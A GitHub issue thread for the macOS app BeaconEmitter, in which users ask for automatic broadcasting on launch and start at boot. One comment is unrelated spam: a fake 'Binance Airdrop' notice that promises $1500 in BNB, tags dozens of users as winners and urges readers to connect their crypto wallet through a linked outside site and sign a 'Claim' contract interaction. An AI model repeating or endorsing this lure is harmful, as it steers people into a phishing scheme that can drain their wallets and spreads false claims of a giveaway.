### ISSUE TITLE
Auto broadcast/start

### ISSUE THREAD

**Issue by ScottG489** [lgaches/BeaconEmitter#24]
Thanks again for a great app!

I think the last requirement I'd really need from this is for it to auto start for me. I think this would consist of two parts:
1. **Start broadcasting when the app starts.** This is probably the most important because although I'm sure mac has ways of starting arbitrary apps automatically, once this particular app opens it still needs manual intervention to start broadcasting.
2. **Run the app on boot/startup.** It would still be handy though if there was an option in the app that you could enable that would take care of whatever setup necessary to have it start on its own.

Let me know if this all makes sense! Happy to split this into two separate issues if you think that would make more sense.

**Comment by ndbroadbent** [comment]
100%, I'm looking for something I can run in the background when my Macbook starts / wakes. I'm using ESPresense to track our phones and watches, so it would be great if we could use this to track our Macbooks as well.

**Comment by epysan** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @ironprice91, @zacklin923, @wagneripjr, @noootown, @liyi3c, @ImmanuelSegol, @flada-auxv, @TheInvalidNonce, @christli, @hhan87, @Ormuzd, @Prometheusaim, @cloudfroster, @JamalC77, @sanmsen, @d3ltcod, @CodeMath, @merlin317, @iliazlobin, @oneryanalexander, @nmsbnmsb1, @xm052359, @yujintang, @Cackbone, @JosePadron, @lovebingo, @joefg, @delimatorres, @danshao, @Wind2esg, @fondroid, @khushalpatel1981, @k1mt4n, @gitlao, @arnbunchen, @NewYorkOpinion, @Kakulukian, @mrcharleshu, @MrEleven, @nkchan, @vinniefalco, @walle1027, @hadaclay, @hitcoogle, @CYONEA, @cora0110, @xuwening, @torgammelgard, @michele-prandina, @ttgb

**Comment by ScottG489** [comment]
Btw I actually stopped using this. You can enroll your devices directly via ESPresense without this.
